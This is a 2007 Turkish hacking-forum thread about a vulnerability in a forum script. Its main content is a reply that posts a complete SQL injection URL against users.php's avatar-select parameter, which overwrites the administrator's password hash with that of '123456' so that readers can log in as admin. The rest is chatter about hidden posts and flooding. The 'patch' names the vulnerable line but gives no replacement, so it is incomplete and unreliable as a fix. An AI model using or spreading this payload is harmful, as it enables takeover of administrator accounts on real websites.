PortalliPortalli  ForumForum  AnasayfaAnasayfa  TakvimTakvim  SSSSSS  AramaArama  Kayıt OlKayıt Ol  Üye ListesiÜye Listesi  Kullanıcı GruplarıKullanıcı Grupları  YöneticilerYöneticiler  Giriş yap  

Paylaş | 
 

 bir açık

Aşağa gitmek 
YazarMesaj
Hacker Namzeti
HTT Üyesi
HTT Üyesi
avatar

Erkek
Mesaj Sayısı : 334
Şehir : www.hackturkiye.ile.biz
Meslek : Hack|Hack
Kayıt tarihi : 30/07/07

MesajKonu: bir açık   Perş. Ağus. 02, 2007 4:34 pm


_________________


Ne Bizi Sevecek Bir Kız Bulabildik;
Ne De Onların Sevebilecekleri Kadar Basit Olabildik.

BENİM DUYGULARIM YOĞUN BE GÜZELİM!!!
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör http://hackturkiye.buygoo.net/
DamaR
HTT Üyesi
HTT Üyesi
avatar

Mesaj Sayısı : 87
Kayıt tarihi : 03/08/07

MesajKonu: Geri: bir açık   Cuma Ağus. 03, 2007 11:40 am

hıde kodu war konu gozukmuyor
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör
ferroli
HTT Üyesi
HTT Üyesi
avatar

Erkek
Mesaj Sayısı : 59
Yaş : 30
Meslek : Md5 kırıcı
Kayıt tarihi : 12/08/07

MesajKonu: Geri: bir açık   Ptsi Ağus. 13, 2007 2:18 pm

site sonuna eklenecek tam kod:
kod:

users.php?m=profile&a=avatarselect&x=011A99&id=def ault.gif%2500%2527,user_password=%2527e10adc3949ba 59abbe56e057f20f883e%2527//**/where/**/user_id=1/*

bu kodu forumda site sonunz eklerseniz adminin şifresini 123456 yapmış oluyormuşsunuz,daha sonra site admin nickini bulup giriş yapabilirmişsiniz.
incelenmeden uygulamamanızı öneririm.Konu incelenmesi için açılmıştır. Geçerliliği yoksa silinmesini Beyan ederim.


kodun savunma tarafı:
Acigi Kapatmak Icin :

bu SQL enjeksiyonu için ufak bir patch işte adım adım ne yapacaklarınız
profile.inc.php veya users.profile.inc.php
dosyalarını açın.

kod:
$avatar = $cfg['av_dir'].urldecode($id);

satırını bulun ve bununla değişin.


konu bu tşkederiz..!!
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör http://www.ferro.azbuz.com
ferroli
HTT Üyesi
HTT Üyesi
avatar

Erkek
Mesaj Sayısı : 59
Yaş : 30
Meslek : Md5 kırıcı
Kayıt tarihi : 12/08/07

MesajKonu: Geri: bir açık   Ptsi Ağus. 13, 2007 2:23 pm

googleden arıyacağımız kod ne ?? Smile
Floo Yasak!
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör http://www.ferro.azbuz.com
ByDooM®-siktiler beni-
Siktir Çekilmiş Üye
Siktir Çekilmiş Üye
avatar

Mesaj Sayısı : 44
Kayıt tarihi : 30/07/07

MesajKonu: Geri: bir açık   Ptsi Ağus. 13, 2007 4:12 pm

flood yasak Ikaz!
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör
ferroli
HTT Üyesi
HTT Üyesi
avatar

Erkek
Mesaj Sayısı : 59
Yaş : 30
Meslek : Md5 kırıcı
Kayıt tarihi : 12/08/07

MesajKonu: Geri: bir açık   Ptsi Ağus. 13, 2007 4:57 pm

flod yapmadık sadece bi hacker olmak isteyen arkadaşımız konuyu görememiş bizde tekrar görüncek şekilde yazdık...!!!
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör http://www.ferro.azbuz.com
 
bir açık
Sayfa başına dön 
1 sayfadaki 1 sayfası

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
 ::  :: WEB Security-
Buraya geçin: